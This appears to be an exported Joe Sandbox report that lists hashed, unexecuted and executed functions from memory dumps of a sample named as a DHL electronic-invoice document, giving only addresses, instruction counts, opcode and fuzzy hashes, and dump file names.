Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c50000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93922add6400bfb65374979b8d607f2897b81b2a1b22aae44ae7df516ebbcc5c
Instruction ID: f48291951b1a4381639355f5e2888ad2233b06ade8bdbe8d6b9adecdb78e2fc3
Opcode Fuzzy Hash: 93922add6400bfb65374979b8d607f2897b81b2a1b22aae44ae7df516ebbcc5c
Instruction Fuzzy Hash: EA51C031B102069FDB14EBB9DC549AEBBF6FFC4720B258969E819D7350EB709D018790

Uniqueness

Uniqueness Score: -1.00%

Function 06C56C78 Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1474139046.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c50000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05534b798f8c24e52ef22467b881fb119f50408e42f34925fe354e3d0858e13b
Instruction ID: f3a2bd60e116e7155e0d55c3e6a65238105ad36238bdeb8d98ac81f7f76ce43a
Opcode Fuzzy Hash: 05534b798f8c24e52ef22467b881fb119f50408e42f34925fe354e3d0858e13b
Instruction Fuzzy Hash: F9418F74E18209CFEB40CF5BD9409BEBBF9FF4D300BA29494D809A7221DB30A951CB55

Uniqueness

Uniqueness Score: -1.00%

Function 06C56F60 Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1474139046.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c50000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d52b63a76d776b890c89d270e88dfbb3b217407ca900dd91ffefc78f760e9002
Instruction ID: 4c2ec045c45f712b0f2533d438b814f1b9bc8737220e31c94da2e4eb4034bf3b
Opcode Fuzzy Hash: d52b63a76d776b890c89d270e88dfbb3b217407ca900dd91ffefc78f760e9002
Instruction Fuzzy Hash: E2412574E04209DFDB40CFAAE885BEDBBB5FF48310F509129E805A7250DB715A81CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 06C5A81C Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1474139046.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c50000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ae5095b47ad4716654885c61def8052c68431d3a65cef06018acadf915d9709
Instruction ID: 7dc5aebe7c865f312f0892694e978120a68d525209e99012c0d281755b77a1a5
Opcode Fuzzy Hash: 9ae5095b47ad4716654885c61def8052c68431d3a65cef06018acadf915d9709
Instruction Fuzzy Hash: 07316B76900209AFDB14CFAAD844ADEBFF9EF48310F10842AE919E7310D770A941CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 06C56DE0 Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1474139046.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c50000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 455cc1700f1ed8c8af384540903d0c21c85f47bbf9bff403b54ec46d3c024036
Instruction ID: e3a137bcce8cf4ed06683c2010e7d62669198953fe81705b139d8e991098c66f
Opcode Fuzzy Hash: 455cc1700f1ed8c8af384540903d0c21c85f47bbf9bff403b54ec46d3c024036
Instruction Fuzzy Hash: 32316734915208CFDB40CF96E845AEEBBF8FB4D300F515094E805A3264CBB59AA1CF94

Uniqueness

Uniqueness Score: -1.00%

Function 06C5F698 Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1474139046.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c50000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b580f0b1d2c4b510591179da1196f39399883d2faca7342d97cceee0f6482a3
Instruction ID: 0bdea6054c1442260f3c48b4b345e071dd18223a7fd38582204a81263ff708d5
Opcode Fuzzy Hash: 7b580f0b1d2c4b510591179da1196f39399883d2faca7342d97cceee0f6482a3
Instruction Fuzzy Hash: 2D31E6B0D016188FEB48DFAAC8446DEBBF6BF89300F14C02AD829AB354EB745945CF54

Uniqueness

Uniqueness Score: -1.00%

Function 06C56628 Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1474139046.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c50000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b881b835a8c51057d69315904998ba8596ced8a2ebf112ae3c37e81dbc60bfa
Instruction ID: f9ee3fe4b2954dda94b5095518d1b761c20c8135dcd7ff575caf86f6d345e695
Opcode Fuzzy Hash: 2b881b835a8c51057d69315904998ba8596ced8a2ebf112ae3c37e81dbc60bfa
Instruction Fuzzy Hash: 7C31C074E012189FDF08DFAAD8406EEBBF6BF88700F50802AE405B7364EB3559429B94

Uniqueness

Uniqueness Score: -1.00%

Function 00BBD3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1465327035.0000000000BBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BBD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bbd000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 882a64886374e6d15a384df4ed350087cc7579c78d42ff8bb0a4ea3558ca2408
Instruction ID: 9a02bfb7ada71a31392cd11b9b1fdbd1715187a5e01129e840b3b110ec6faf2d
Opcode Fuzzy Hash: 882a64886374e6d15a384df4ed350087cc7579c78d42ff8bb0a4ea3558ca2408
Instruction Fuzzy Hash: E8212871504204DFDB04DF10D9C0B66BBE5FB94314F20C5A9E8090B356D37AE856CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00BBD4C4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1465327035.0000000000BBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BBD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bbd000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c786bc873852c4caa3966d64ec9b068268dbc89728f64cdbc0d1375864747281
Instruction ID: bf963b21f1eae992f5a29ede839f91292b5839f4690bd5669f8cd8bdf22d8ad8
Opcode Fuzzy Hash: c786bc873852c4caa3966d64ec9b068268dbc89728f64cdbc0d1375864747281
Instruction Fuzzy Hash: F9212571504240EFDB25DF10D9C0B76BFE5FB98318F20C5A9E8090B256D37AD856CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00BCD01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1465373985.0000000000BCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BCD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bcd000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba8756e8f5f7555102b1ea58a5c7190806b097641c7a8800c7282aa01401e025
Instruction ID: 323f78fd2e9845d7c851eaefbdc52d89176fcce110745894d1b2c3e5c9f40cfb
Opcode Fuzzy Hash: ba8756e8f5f7555102b1ea58a5c7190806b097641c7a8800c7282aa01401e025
Instruction Fuzzy Hash: 6521CF79604240AFDB14DF28D9D4F26BBE5FB84314F20C5BDE84A4B296C336D847CA62

Uniqueness

Uniqueness Score: -1.00%

Function 00BCD1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1465373985.0000000000BCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BCD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bcd000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f2824dfe9e0a9df8548c1a4adabc4ba9f2e61e83894cf78ab09032054a869ae3
Instruction ID: 053c9c920eb9b13d088bd57eaf6e14fe43e8e31186b1f416173134a6679e11f5
Opcode Fuzzy Hash: f2824dfe9e0a9df8548c1a4adabc4ba9f2e61e83894cf78ab09032054a869ae3
Instruction Fuzzy Hash: 0321B0B9604244AFDB05DF50D9C4F26BBE5FB84314F24C5BDE8494F292C336D846CA61

Uniqueness

Uniqueness Score: -1.00%

Function 06C5CDA0 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1474139046.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c50000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c437590e1f495d58773ce8ebabbfb8b5d45c230996acfef436c10c09df708a07
Instruction ID: 62f218a48076ecd3f0b3203b41f1a9bbb5b3b33590f33d8b653f62aeadf49fa8
Opcode Fuzzy Hash: c437590e1f495d58773ce8ebabbfb8b5d45c230996acfef436c10c09df708a07
Instruction Fuzzy Hash: AE213A70E48308DFDB88DFA9C9416AEBBB5BF49300F5190ADD805AB251D7709E80DB98

Uniqueness

Uniqueness Score: -1.00%

Function 06C57CE4 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1474139046.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c50000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb3b0d4a06698075785fe3b4703baf79f8204bdaf46942a1b047c134f3bfacc9
Instruction ID: 6f5d0f6b6f9ec88bf2abae5f30522d88710929f4cd42d4e470c86bb14779faa0
Opcode Fuzzy Hash: cb3b0d4a06698075785fe3b4703baf79f8204bdaf46942a1b047c134f3bfacc9
Instruction Fuzzy Hash: 5631F4B0D01258DFDB60DFDAC984B8DBBF4AB48714F258159E804BB240C7B66985CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00BCD006 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1465373985.0000000000BCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BCD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bcd000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de4b61cdfb0a42966473224f0286b82e5f594130864bf74b646cd03c2c3d6d1c
Instruction ID: 51b15f5cc697f345f6670969bd2a2289b884768c392dfb514105d92dd3a6cc0c
Opcode Fuzzy Hash: de4b61cdfb0a42966473224f0286b82e5f594130864bf74b646cd03c2c3d6d1c
Instruction Fuzzy Hash: 1D21A4795093808FCB12CF24D594B15BFB1EB45314F28C5EED8498B697C33A980ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 06C5A550 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1474139046.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c50000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df19e2e08e6acc37b2b707b1d1e8c3887fc9c34a0965479ef115d97dfd3e7741
Instruction ID: 151696ada1060ec04df817a291112bcbb5d728fef339f339e245a61387c1482d
Opcode Fuzzy Hash: df19e2e08e6acc37b2b707b1d1e8c3887fc9c34a0965479ef115d97dfd3e7741
Instruction Fuzzy Hash: 1F111F71F0021A8BCB54EBAA98145EEB7F6BB85210B504169C904E7240EF358E45CB95

Uniqueness

Uniqueness Score: -1.00%

Function 06C5A82C Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1474139046.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c50000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d21a58699c3e7611dedf449666a342c664e7ffd4bf066df58260ff8a3677fcc7
Instruction ID: 30c07ebffd9bdba5aeb38912537fbaf2b3ce71660cb418acd6a1a940c153ce73
Opcode Fuzzy Hash: d21a58699c3e7611dedf449666a342c664e7ffd4bf066df58260ff8a3677fcc7
Instruction Fuzzy Hash: D42103B58043499FDB10CFAAD884BDEBFF4FB48310F10841AE919A7200C374A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00BBD4BF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1465327035.0000000000BBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BBD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bbd000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01a772179decf110bb882872cb952e1b13b119dd61991aef1ad72797cf3e64a4
Instruction ID: 5dc1a7ce38a9430a25f586be2fb4a81adf68cb9a725f9755ba55b4f7d2fe2d7d
Opcode Fuzzy Hash: 01a772179decf110bb882872cb952e1b13b119dd61991aef1ad72797cf3e64a4
Instruction Fuzzy Hash: 5D11E676504280CFCB15CF10D5C4B66BFB1FB94318F24C6E9D8490B656C33AD85ACBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00BBD3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1465327035.0000000000BBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BBD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bbd000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01a772179decf110bb882872cb952e1b13b119dd61991aef1ad72797cf3e64a4
Instruction ID: adb9c6c51a1cc0b1e7098439b0b74411b26d8fb6005ae0c3e9a3f9624ce3d331
Opcode Fuzzy Hash: 01a772179decf110bb882872cb952e1b13b119dd61991aef1ad72797cf3e64a4
Instruction Fuzzy Hash: 8C11D376504240DFCB15CF10D5C4B66BFB1FB94324F24C6A9D8090B756C37AE85ACBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00BCD1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1465373985.0000000000BCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BCD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bcd000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb11cfc8073ccb158cd0f42583cdb3ded50e3effa001a3c93aefd0de24dc37f6
Instruction ID: 8a318f8ad8a1a1eeff2e6f15b7b5b6a2403223ef0f0f6706a41f28d5d8fe9c62
Opcode Fuzzy Hash: fb11cfc8073ccb158cd0f42583cdb3ded50e3effa001a3c93aefd0de24dc37f6
Instruction Fuzzy Hash: 9E118B7A604280DFCB15CF10D9C4B15BBA1FB84318F24C6AED8494F696C33AD84ACB61

Uniqueness

Uniqueness Score: -1.00%

Function 06C56850 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1474139046.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c50000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a41b551ba55c8ccafc7b4c596204e39e47eed4c416a8f484df3c0769b094d6da
Instruction ID: aa8f28e31d3c8959558ed8b8580b7c05fa045c6cdeffb94bf752656250b9259b
Opcode Fuzzy Hash: a41b551ba55c8ccafc7b4c596204e39e47eed4c416a8f484df3c0769b094d6da
Instruction Fuzzy Hash: B4F0C774D0D208DFDB44DFA7D9455ACFBF89B4B300F4191AAC80993321DA355784CB45

Uniqueness

Uniqueness Score: -1.00%

Function 06C5BBB8 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1474139046.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c50000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6166930c5c2b68e4479147143dbeb5353aab13e9b81dbbbae02e229c7e3f6c04
Instruction ID: 9fcdc922daac46499b8ad193b5c7ac3eced99d7b820da1a82b90b4943b6db7c5
Opcode Fuzzy Hash: 6166930c5c2b68e4479147143dbeb5353aab13e9b81dbbbae02e229c7e3f6c04
Instruction Fuzzy Hash: 74F01574E04208EFCB84EFA8C940AACBBB4EB48300F10C0AAAC08A3300D6359A51DF84

Uniqueness

Uniqueness Score: -1.00%

Function 06C5A400 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1474139046.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c50000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be9ae06ba5a723dde73544a8c6e329e6cee0c778712b753de2a11bf6892bc5c6
Instruction ID: 6f293fadecb7ef69530f7e009853c5d44c1be9eba91582aaf951541220611c33
Opcode Fuzzy Hash: be9ae06ba5a723dde73544a8c6e329e6cee0c778712b753de2a11bf6892bc5c6
Instruction Fuzzy Hash: C1E0C974E04208EFCB84DFE9D945AACBBF4EB49300F10C1AA9D1893350DB359A52DF84

Uniqueness

Uniqueness Score: -1.00%

Function 06C56800 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1474139046.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c50000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5703f96d9c64b3ed72881f69fe534935b80a405b988ff7731ed0fb17fcc94576
Instruction ID: b12d44bdbab9ebdc7fe0520c9fd68c1fea41e1c235c69be854fd38a2d459ac3e
Opcode Fuzzy Hash: 5703f96d9c64b3ed72881f69fe534935b80a405b988ff7731ed0fb17fcc94576
Instruction Fuzzy Hash: 2FE0E574E04208EFCB94DFA9D9416ACBBF4EB49200F10C0AAD81893351D6359A42CF85

Uniqueness

Uniqueness Score: -1.00%

Function 06C593C8 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1474139046.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c50000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b4fdae5123e504251ca431c2ff164c05bfe6c6a8eee58fa15fe7b7b2bedbaf3
Instruction ID: 973c4ea4659df5e8267fc713137b939b7424e848799943a30d5d1348719ee829
Opcode Fuzzy Hash: 4b4fdae5123e504251ca431c2ff164c05bfe6c6a8eee58fa15fe7b7b2bedbaf3
Instruction Fuzzy Hash: 19E0C274E04208EFCB84DFA9D8916ACBBF4EB49200F1081E9980893341DB359A42CB84

Uniqueness

Uniqueness Score: -1.00%

Function 06C5C550 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1474139046.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c50000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5703f96d9c64b3ed72881f69fe534935b80a405b988ff7731ed0fb17fcc94576
Instruction ID: 1e8484bdfd85a874cdb2a5d848e32f3da4170b001d07d7d3673ff0f3f5fb6425
Opcode Fuzzy Hash: 5703f96d9c64b3ed72881f69fe534935b80a405b988ff7731ed0fb17fcc94576
Instruction Fuzzy Hash: 58E0E574E04208EFCB84DFA8D9416ACBBF4EB49200F5081ADD81893340D6359A82DF84

Uniqueness

Uniqueness Score: -1.00%

Function 06C50B14 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1474139046.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c50000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f848f3f7204e090c0bd704ae2f4aa00152d97576892fd090ac7d9927c91ac5c
Instruction ID: d12c53a6cc7abaccabcd8000228c0666cab0743ab51894b0fbba45fab27650ae
Opcode Fuzzy Hash: 9f848f3f7204e090c0bd704ae2f4aa00152d97576892fd090ac7d9927c91ac5c
Instruction Fuzzy Hash: 94F07A74911228CFEB60DF28ECA9BD9BBB1BB09305F1091E9D50DA6240DB749EC1CF52

Uniqueness

Uniqueness Score: -1.00%

Function 06C578E0 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1474139046.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c50000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16ea6ece78da1b8f3e601175b7c24e42f287677144e487a4ea95f6dc1b53dcd4
Instruction ID: 8b4363788709c0196dcac076336e8f25900594198deded30be55a12ff56a61bb
Opcode Fuzzy Hash: 16ea6ece78da1b8f3e601175b7c24e42f287677144e487a4ea95f6dc1b53dcd4
Instruction Fuzzy Hash: 4BE0127590A308DFDB44DFB4E80569E7BFCEB4A211F1045EAE40AA3120EF714A85DB96

Uniqueness

Uniqueness Score: -1.00%

Function 06C565E0 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1474139046.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c50000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d99f7fd07694b3c5217130d88c63209f6a5894f45c1213a5b09abc0b3acb6d7
Instruction ID: e99b0e320357f04606998907c4c10997f1d2412c5c9da6e03da400e4793e88bd
Opcode Fuzzy Hash: 9d99f7fd07694b3c5217130d88c63209f6a5894f45c1213a5b09abc0b3acb6d7
Instruction Fuzzy Hash: 9EE0ECB4D55308EFDB84DFA9D9456ADBBF8AB09201F9000B9D80893351EA305A84CB45

Uniqueness

Uniqueness Score: -1.00%

Function 06C5CD60 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1474139046.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c50000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4203d822a9ca57f83189baad0d97fde885575e53e592d4c5d63e9a117794e2f
Instruction ID: b2d10188a7706d27b9302b3b7ce06a3cfdb4e94dabf36925e755fdc5321c7ab9
Opcode Fuzzy Hash: f4203d822a9ca57f83189baad0d97fde885575e53e592d4c5d63e9a117794e2f
Instruction Fuzzy Hash: E8E08C34948208EBCB04DB94D941A6CBBB4AB46300F1080ACCC0857340CA319E92CB88

Uniqueness

Uniqueness Score: -1.00%

Function 06C51BC3 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1474139046.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c50000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c54832aade3f2ebf98f1d3e9f90db5ab74fcaa34e23f591660df8882ce8169d
Instruction ID: 89def1c984282c88ee277eb2e4e0b0028edaafeb3c840c534d48e73a0ce1313b
Opcode Fuzzy Hash: 8c54832aade3f2ebf98f1d3e9f90db5ab74fcaa34e23f591660df8882ce8169d
Instruction Fuzzy Hash: 41F05FB4A915298FDB64CF15CD8578EBBB0BF49315F0040EADA8EA3200DB745E85CF0A

Uniqueness

Uniqueness Score: -1.00%

Function 06C5ECE0 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1474139046.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c50000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9fcf607bceb2bb9961b1293f763d17d57529d742a2c67383b0ae2e351ac93f14
Instruction ID: 22bc5ca2131ecc50f1f82e3ae521c294b68bd13d701cce1ad46ee2eed9ee3566
Opcode Fuzzy Hash: 9fcf607bceb2bb9961b1293f763d17d57529d742a2c67383b0ae2e351ac93f14
Instruction Fuzzy Hash: 18B02B3001530447E21C2650640E3317B9CD70B301F000854BA0C001510F70D080C698

Uniqueness

Uniqueness Score: -1.00%

Function 06C5EC60 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1474139046.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c50000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 545c1f1e979951089b9e951adce9a5efc444e5bf910493f60bbe956a73929162
Instruction ID: f43f76a209af27b721925f1e797df859456248ded07ef11cdd8ebff60ef9d153
Opcode Fuzzy Hash: 545c1f1e979951089b9e951adce9a5efc444e5bf910493f60bbe956a73929162
Instruction Fuzzy Hash: C0C08C310513048BE21827A0A80E324BF6CAB0A702F400068F649451504F70D180C6AA

Uniqueness

Uniqueness Score: -1.00%

Function 06C5A7B4 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1474139046.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c50000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9fad5e5205e8c5aa6c988c23aef2d96468a6375078c3a8e573edb6f49298f907
Instruction ID: 1a97c9b4c1ab9b3d69132bb88e2bc8d28add4a879176221d0e2c1fa78316c95c
Opcode Fuzzy Hash: 9fad5e5205e8c5aa6c988c23aef2d96468a6375078c3a8e573edb6f49298f907
Instruction Fuzzy Hash: 8AB01276254641FA62C163E1CC95B2F9551FBE2B00B85CC123B8440010C6A048A5E15F

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 06C50040 Relevance: 1.3, Strings: 1, Instructions: 97COMMON

Download Yara Rule

Strings

/, xrefs: 06C51FC8

Memory Dump Source

Source File: 00000000.00000002.1474139046.0000000006C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c50000_DHL Factura Electronica Pendiente documento No 04BB25083.jbxd

Similarity

API ID:
String ID: /
API String ID: 0-2043925204
Opcode ID: a3c4b4408c42c312a0122434400eb7879ac2ea27da9c7a7864a88fb4b473260c
Instruction ID: 1ac0cc43e0dffdecc5f96fc062d47d8a6f245a4096c10977f16dfe7afcf748d0
Opcode Fuzzy Hash: a3c4b4408c42c312a0122434400eb7879ac2ea27da9c7a7864a88fb4b473260c
